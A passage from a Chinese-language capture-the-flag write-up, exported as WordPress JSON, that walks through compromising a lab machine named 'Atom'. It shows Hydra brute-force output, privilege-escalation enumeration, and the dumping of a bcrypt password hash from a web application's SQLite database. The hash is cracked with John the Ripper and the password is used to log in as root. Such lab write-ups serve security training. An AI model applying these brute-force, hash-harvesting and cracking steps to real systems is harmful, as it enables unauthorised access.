jiggaman\n[STATUS] 304.00 tries\/min, 608 tries in 00:02h, 178 to do in 00:01h, 14 active\n1 of 1 target successfully completed, 1 valid password found\nHydra (https:\/\/github.com\/vanhauser-thc\/thc-hydra) finished at 2024-07-18 13:49:59<\/code><\/pre>\n<p>\u627e\u5230\u4e00\u4e2a\u7528\u6237\uff0c\u5c1d\u8bd5\u8fdb\u884c\u767b\u5f55\uff1a<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221987.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221987.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240719015033216\" style=\"zoom: 33%;\" \/><\/div><\/p>\n<h2>\u63d0\u6743<\/h2>\n<h3>\u4fe1\u606f\u641c\u96c6<\/h3>\n<pre><code class=\"language-bash\">onida@atom:~$ sudo -l\n-bash: sudo: command not found\nonida@atom:~$ echo $SHELL\n\/bin\/bash\nonida@atom:~$ pwd\n\/home\/onida\nonida@atom:~$ ls -la\ntotal 24\ndrwx------ 2 onida onida 4096 Dec 31  2400 .\ndrwxr-xr-x 3 root  root  4096 May 24 13:55 ..\nlrwxrwxrwx 1 root  root     9 May 24 14:16 .bash_history -&gt; \/dev\/null\n-rw-r--r-- 1 onida onida  220 Dec 31  2400 .bash_logout\n-rw-r--r-- 1 onida onida 3526 Dec 31  2400 .bashrc\n-rw-r--r-- 1 onida onida  807 Dec 31  2400 .profile\n-rwx------ 1 onida onida   33 Dec 31  2400 user.txt\nonida@atom:~$ cat user.txt \nf75390001fa2fe806b4e3f1e5dadeb2b\nonida@atom:~$ find  \/ -perm -u=s -type f 2&gt;\/dev\/null\n\/usr\/bin\/passwd\n\/usr\/bin\/su\n\/usr\/bin\/chsh\n\/usr\/bin\/chfn\n\/usr\/bin\/gpasswd\n\/usr\/bin\/umount\n\/usr\/bin\/newgrp\n\/usr\/bin\/mount\n\/usr\/sbin\/pppd\n\/usr\/lib\/openssh\/ssh-keysign\n\/usr\/lib\/dbus-1.0\/dbus-daemon-launch-helper\n\/usr\/lib\/polkit-1\/polkit-agent-helper-1\nonida@atom:~$ \/usr\/sbin\/getcap -r \/ 2&gt;\/dev\/null\n\/usr\/bin\/ping cap_net_raw=ep\nonida@atom:~$ cd \/opt\nonida@atom:\/opt$ ls -la\ntotal 8\ndrwxr-xr-x  2 root root 4096 Mar  9 12:26 .\ndrwxr-xr-x 18 root root 4096 May 24 14:18 ..\nonida@atom:\/opt$ cd \/\nonida@atom:\/$ ls -la\ntotal 68\ndrwxr-xr-x  18 root root  4096 May 24 14:18 .\ndrwxr-xr-x  18 root root  4096 May 24 14:18 ..\nlrwxrwxrwx   1 root root     7 Mar  9 12:26 bin -&gt; usr\/bin\ndrwxr-xr-x   3 root root  4096 May 24 14:18 boot\ndrwxr-xr-x  17 root root  3320 Jul 18 17:25 dev\ndrwxr-xr-x  86 root root  4096 Jul 18 17:25 etc\ndrwxr-xr-x   3 root root  4096 May 24 13:55 home\nlrwxrwxrwx   1 root root    30 May 24 14:18 initrd.img -&gt; boot\/initrd.img-6.1.0-21-amd64\nlrwxrwxrwx   1 root root    30 Mar  9 12:28 initrd.img.old -&gt; boot\/initrd.img-6.1.0-18-amd64\nlrwxrwxrwx   1 root root     7 Mar  9 12:26 lib -&gt; usr\/lib\nlrwxrwxrwx   1 root root     9 Mar  9 12:26 lib64 -&gt; usr\/lib64\ndrwx------   2 root root 16384 Mar  9 12:26 lost+found\ndrwxr-xr-x   3 root root  4096 Mar  9 12:26 media\ndrwxr-xr-x   2 root root  4096 Mar  9 12:26 mnt\ndrwxr-xr-x   2 root root  4096 Mar  9 12:26 opt\ndr-xr-xr-x 148 root root     0 Jul 18 17:25 proc\ndrwx------   4 root root  4096 May 27 15:43 root\ndrwxr-xr-x  21 root root   620 Jul 18 19:50 run\nlrwxrwxrwx   1 root root     8 Mar  9 12:26 sbin -&gt; usr\/sbin\ndrwxr-xr-x   2 root root  4096 Mar  9 12:26 srv\ndr-xr-xr-x  13 root root     0 Jul 18 17:25 sys\ndrwxrwxrwt  10 root root  4096 Jul 18 19:39 tmp\ndrwxr-xr-x  12 root root  4096 Mar  9 12:26 usr\ndrwxr-xr-x  12 root root  4096 May 25 22:19 var\nlrwxrwxrwx   1 root root    27 May 24 14:18 vmlinuz -&gt; boot\/vmlinuz-6.1.0-21-amd64\nlrwxrwxrwx   1 root root    27 Mar  9 12:28 vmlinuz.old -&gt; boot\/vmlinuz-6.1.0-18-amd64\nonida@atom:\/$ cd \/var\/www\nonida@atom:\/var\/www$ ls -la\ntotal 12\ndrwxr-xr-x  3 root     root     4096 May 25 22:19 .\ndrwxr-xr-x 12 root     root     4096 May 25 22:19 ..\ndrwxr-xr-x  6 www-data www-data 4096 May 27 15:21 html\nonida@atom:\/var\/www$ cd html\nonida@atom:\/var\/www\/html$ ls -la\ntotal 172\ndrwxr-xr-x 6 www-data www-data   4096 May 27 15:21 .\ndrwxr-xr-x 3 root     root       4096 May 25 22:19 ..\n-rwxr-xr-x 1 www-data www-data 114688 May 27 15:21 atom-2400-database.db\ndrwxr-xr-x 2 www-data www-data   4096 Dec 31  2400 css\ndrwxr-xr-x 4 www-data www-data   4096 Dec 31  2400 img\n-rw-r--r-- 1 www-data www-data  11767 Dec 31  2400 index.php\ndrwxr-xr-x 2 www-data www-data   4096 Dec 31  2400 js\n-rw-r--r-- 1 www-data www-data   6262 Dec 31  2400 login.php\n-rwxr-xr-x 1 www-data www-data   1637 Dec 31  2400 profile.php\n-rw-r--r-- 1 www-data www-data   5534 Dec 31  2400 register.php\ndrwxr-xr-x 2 www-data www-data   4096 Dec 31  2400 video\nonida@atom:\/var\/www\/html$ cat profile.php \n&lt;?php\nsession_start();\n\nif (!isset($_SESSION[&#039;user&#039;])) {\n    header(&#039;Location: login.php&#039;);\n    exit();\n}\n?&gt;\n&lt;!DOCTYPE html&gt;\n&lt;html lang=&quot;en&quot;&gt;\n&lt;head&gt;\n    &lt;meta charset=&quot;UTF-8&quot;&gt;\n    &lt;meta http-equiv=&quot;X-UA-Compatible&quot; content=&quot;IE=edge&quot;&gt;\n    &lt;meta name=&quot;viewport&quot; content=&quot;width=device-width, initial-scale=1.0&quot;&gt;\n    &lt;title&gt;Atom Owns The World&lt;\/title&gt;\n    &lt;style&gt;\n        body, html {\n            height: 100%;\n            margin: 0;\n            display: flex;\n            justify-content: center;\n            align-items: center;\n            font-family: &#039;Arial&#039;, sans-serif;\n            color: white;\n            background: none;\n            overflow: hidden;\n        }\n        .bg-video {\n            position: fixed;\n            top: 50%;\n            left: 50%;\n            width: 100%;\n            height: 100%;\n            object-fit: cover;\n            transform: translate(-50%, -50%);\n            z-index: -1;\n        }\n        .message-container {\n            text-align: center;\n            background-color: rgba(0, 0, 0, 0.5);\n            padding: 20px;\n            border-radius: 10px;\n        }\n    &lt;\/style&gt;\n&lt;\/head&gt;\n&lt;body&gt;\n    &lt;video autoplay muted loop class=&quot;bg-video&quot;&gt;\n        &lt;source src=&quot;video\/gfp-astro-timelapse.mp4&quot; type=&quot;video\/mp4&quot;&gt;\n    &lt;\/video&gt;\n    &lt;div class=&quot;message-container&quot;&gt;\n        &lt;?php\n        echo &#039;&lt;h1&gt;Welcome, &#039; . htmlspecialchars($_SESSION[&#039;user&#039;]) . &#039;!&lt;\/h1&gt;&#039;;\n        if ($_SESSION[&#039;user&#039;] == &#039;atom&#039;) {\n            echo &#039;&lt;p&gt;You\\&#039;ve finally become the root of the earth!&lt;\/p&gt;&#039;;\n        } else {\n            echo &#039;&lt;p&gt;You\\&#039;ll soon be Atom\\&#039;s servant!&lt;\/p&gt;&#039;;\n        }\n        ?&gt;\n    &lt;\/div&gt;\n&lt;\/body&gt;\n&lt;\/html&gt;\nonida@atom:\/var\/www\/html$ cat atom-2400-database.db \nQ\ufffdY\ufffd&amp;\ufffd\ufffdmtableusersusersCREATE TABLE users (\n    id INTEGER PRIMARY KEY,\n    username TEXT UNIQUE NOT NULL,\n    password TEXT NOT NULL\n))=indexsqlite_autoindex_users_1user\ufffd$))\ufffdtablelogin_attemptslogin_attemptsCREATE TABLE login_attempts (\n    id INTEGER PRIMARY KEY,\n    ip_address TEXT NOT NULL,\n    attempt_time INTEGER NOT NULL\n\ufffd\ufffdnKE\ufffdatom$2y$10$Z1K.4yVakZEY.Qsju3WZzukW\/M3fI6BkSohYOiBQqG7pK1F2fH9Cm\n\ufffd\ufffd\ufffd     atom<\/code><\/pre>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221988.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221988.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240719015814111\" style=\"zoom:50%;\" \/><\/div><\/p>\n<p>\u5185\u90e8\u5f00\u653e\u4e86\u76f8\u5173\u7aef\u53e3\uff0c\u5c1d\u8bd5\u8bfb\u53d6\u6570\u636e\u5e93\uff1a<\/p>\n<pre><code class=\"language-bash\">onida@atom:\/var\/www\/html$ sqlite3\nSQLite version 3.40.1 2022-12-28 14:03:47\nEnter &quot;.help&quot; for usage hints.\nConnected to a transient in-memory database.\nUse &quot;.open FILENAME&quot; to reopen on a persistent database.\nsqlite&gt; .help\n.archive ...             Manage SQL archives\n.auth ON|OFF             Show authorizer callbacks\n.backup ?DB? FILE        Backup DB (default &quot;main&quot;) to FILE\n.bail on|off             Stop after hitting an error.  Default OFF\n.binary on|off           Turn binary output on or off.  Default OFF\n.cd DIRECTORY            Change the working directory to DIRECTORY\n.changes on|off          Show number of rows changed by SQL\n.check GLOB              Fail if output since .testcase does not match\n.clone NEWDB             Clone data into NEWDB from the existing database\n.connection [close] [#]  Open or close an auxiliary database connection\n.databases               List names and files of attached databases\n.dbconfig ?op? ?val?     List or change sqlite3_db_config() options\n.dbinfo ?DB?             Show status information about the database\n.dump ?OBJECTS?          Render database content as SQL\n.echo on|off             Turn command echo on or off\n.eqp on|off|full|...     Enable or disable automatic EXPLAIN QUERY PLAN\n.excel                   Display the output of next command in spreadsheet\n.exit ?CODE?             Exit this program with return-code CODE\n.expert                  EXPERIMENTAL. Suggest indexes for queries\n.explain ?on|off|auto?   Change the EXPLAIN formatting mode.  Default: auto\n.filectrl CMD ...        Run various sqlite3_file_control() operations\n.fullschema ?--indent?   Show schema and the content of sqlite_stat tables\n.headers on|off          Turn display of headers on or off\n.help ?-all? ?PATTERN?   Show help text for PATTERN\n.import FILE TABLE       Import data from FILE into TABLE\n.imposter INDEX TABLE    Create imposter table TABLE on index INDEX\n.indexes ?TABLE?         Show names of indexes\n.limit ?LIMIT? ?VAL?     Display or change the value of an SQLITE_LIMIT\n.lint OPTIONS            Report potential schema issues.\n.load FILE ?ENTRY?       Load an extension library\n.log FILE|off            Turn logging on or off.  FILE can be stderr\/stdout\n.mode MODE ?OPTIONS?     Set output mode\n.nonce STRING            Suspend safe mode for one command if nonce matches\n.nullvalue STRING        Use STRING in place of NULL values\n.once ?OPTIONS? ?FILE?   Output for the next SQL command only to FILE\n.open ?OPTIONS? ?FILE?   Close existing database and reopen FILE\n.output ?FILE?           Send output to FILE or stdout if FILE is omitted\n.parameter CMD ...       Manage SQL parameter bindings\n.print STRING...         Print literal STRING\n.progress N              Invoke progress handler after every N opcodes\n.prompt MAIN CONTINUE    Replace the standard prompts\n.quit                    Exit this program\n.read FILE               Read input from FILE or command output\n.recover                 Recover as much data as possible from corrupt db.\n.restore ?DB? FILE       Restore content of DB (default &quot;main&quot;) from FILE\n.save ?OPTIONS? FILE     Write database to FILE (an alias for .backup ...)\n.scanstats on|off        Turn sqlite3_stmt_scanstatus() metrics on or off\n.schema ?PATTERN?        Show the CREATE statements matching PATTERN\n.selftest ?OPTIONS?      Run tests defined in the SELFTEST table\n.separator COL ?ROW?     Change the column and row separators\n.session ?NAME? CMD ...  Create or control sessions\n.sha3sum ...             Compute a SHA3 hash of database content\n.shell CMD ARGS...       Run CMD ARGS... in a system shell\n.show                    Show the current values for various settings\n.stats ?ARG?             Show stats or turn stats on or off\n.system CMD ARGS...      Run CMD ARGS... in a system shell\n.tables ?TABLE?          List names of tables matching LIKE pattern TABLE\n.testcase NAME           Begin redirecting output to &#039;testcase-out.txt&#039;\n.testctrl CMD ...        Run various sqlite3_test_control() operations\n.timeout MS              Try opening locked tables for MS milliseconds\n.timer on|off            Turn SQL timer on or off\n.trace ?OPTIONS?         Output each SQL statement as it is run\n.vfsinfo ?AUX?           Information about the top-level VFS\n.vfslist                 List all available VFSes\n.vfsname ?AUX?           Print the name of the VFS stack\n.width NUM1 NUM2 ...     Set minimum column widths for columnar output\nsqlite&gt; .open atom-2400-database.db\nsqlite&gt; .databases\nmain: \/var\/www\/html\/atom-2400-database.db r\/o\nsqlite&gt; .schema\nCREATE TABLE login_attempts (\n    id INTEGER PRIMARY KEY,\n    ip_address TEXT NOT NULL,\n    attempt_time INTEGER NOT NULL\n);\nCREATE TABLE users (\n    id INTEGER PRIMARY KEY,\n    username TEXT UNIQUE NOT NULL,\n    password TEXT NOT NULL\n);\nsqlite&gt; .output \/tmp\/temp.sql\nsqlite&gt; .dump users\n\nonida@atom:\/var\/www\/html$ cd \/tmp\nonida@atom:\/tmp$ ls -la\ntotal 44\ndrwxrwxrwt 10 root  root  4096 Jul 18 20:17 .\ndrwxr-xr-x 18 root  root  4096 May 24 14:18 ..\ndrwxrwxrwt  2 root  root  4096 Jul 18 17:25 .font-unix\ndrwxrwxrwt  2 root  root  4096 Jul 18 17:25 .ICE-unix\ndrwx------  3 root  root  4096 Jul 18 17:25 systemd-private-8301098cde004f0ab5d5a6e6507d4554-apache2.service-ZaMynb\ndrwx------  3 root  root  4096 Jul 18 17:25 systemd-private-8301098cde004f0ab5d5a6e6507d4554-ModemManager.service-orjtq7\ndrwx------  3 root  root  4096 Jul 18 17:25 systemd-private-8301098cde004f0ab5d5a6e6507d4554-systemd-logind.service-Lau3sB\ndrwx------  3 root  root  4096 Jul 18 17:25 systemd-private-8301098cde004f0ab5d5a6e6507d4554-systemd-timesyncd.service-0iGCTP\n-rw-r--r--  1 onida onida  265 Jul 18 20:17 temp.sql\ndrwxrwxrwt  2 root  root  4096 Jul 18 17:25 .X11-unix\ndrwxrwxrwt  2 root  root  4096 Jul 18 17:25 .XIM-unix\nonida@atom:\/tmp$ cat temp.sql \nPRAGMA foreign_keys=OFF;\nBEGIN TRANSACTION;\nCREATE TABLE users (\n    id INTEGER PRIMARY KEY,\n    username TEXT UNIQUE NOT NULL,\n    password TEXT NOT NULL\n);\nINSERT INTO users VALUES(1,&#039;atom&#039;,&#039;$2y$10$Z1K.4yVakZEY.Qsju3WZzukW\/M3fI6BkSohYOiBQqG7pK1F2fH9Cm&#039;);\nCOMMIT;<\/code><\/pre>\n<p>\u5c1d\u8bd5 hash \u78b0\u649e\u4e00\u4e0b\uff1a<\/p>\n<pre><code class=\"language-bash\">\u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom]\n\u2514\u2500$ john hash\nUsing default input encoding: UTF-8\nLoaded 1 password hash (bcrypt [Blowfish 32\/64 X3])\nCost 1 (iteration count) is 1024 for all loaded hashes\nWill run 2 OpenMP threads\nProceeding with single, rules:Single\nPress &#039;q&#039; or Ctrl-C to abort, almost any other key for status\nAlmost done: Processing the remaining buffered candidate passwords, if any.\nProceeding with wordlist:\/usr\/share\/john\/password.lst\nmadison          (?)     \n1g 0:00:00:02 DONE 2\/3 (2024-07-18 14:19) 0.4255g\/s 84.25p\/s 84.25c\/s 84.25C\/s goodluck..mother\nUse the &quot;--show&quot; option to display all of the cracked passwords reliably\nSession completed. <\/code><\/pre>\n<p>\u4f7f\u7528\u5bc6\u7801\u5373\u53ef\u767b\u5f55root\u3002<\/p>\n<p><div class='fancybox-wrapper lazyload-container-unload' data-fancybox='post-images' href='https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221989.png'><img class=\"lazyload lazyload-style-2\" src=\"data:image\/svg+xml;base64,PCEtLUFyZ29uTG9hZGluZy0tPgo8c3ZnIHdpZHRoPSIxIiBoZWlnaHQ9IjEiIHhtbG5zPSJodHRwOi8vd3d3LnczLm9yZy8yMDAwL3N2ZyIgc3Ryb2tlPSIjZmZmZmZmMDAiPjxnPjwvZz4KPC9zdmc+\"  decoding=\"async\" data-original=\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202407190221989.png\" src=\"data:image\/png;base64,iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcSJAAAAAXNSR0IArs4c6QAAAARnQU1BAACxjwv8YQUAAAAJcEhZcwAADsQAAA7EAZUrDhsAAAANSURBVBhXYzh8+PB\/AAffA0nNPuCLAAAAAElFTkSuQmCC\" alt=\"image-20240719022136631\" style=\"zoom:50%;\" \/><\/div><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Atom \u4fe1\u606f\u641c\u96c6 \u7aef\u53e3\u626b\u63cf \u250c\u2500\u2500(kali\ud83d\udc80kali)-[~\/temp\/Atom] \u2514\u2500$ rustsca [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[11,18],"tags":[],"class_list":["post-763","post","type-post","status-publish","format-standard","hentry","category-ctf-and-protest","category-web"],"_links":{"self":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/763","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/comments?post=763"}],"version-history":[{"count":1,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/763\/revisions"}],"predecessor-version":[{"id":764,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/posts\/763\/revisions\/764"}],"wp:attachment":[{"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/media?parent=763"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/categories?post=763"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/162.14.82.114\/index.php\/wp-json\/wp\/v2\/tags?post=763"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}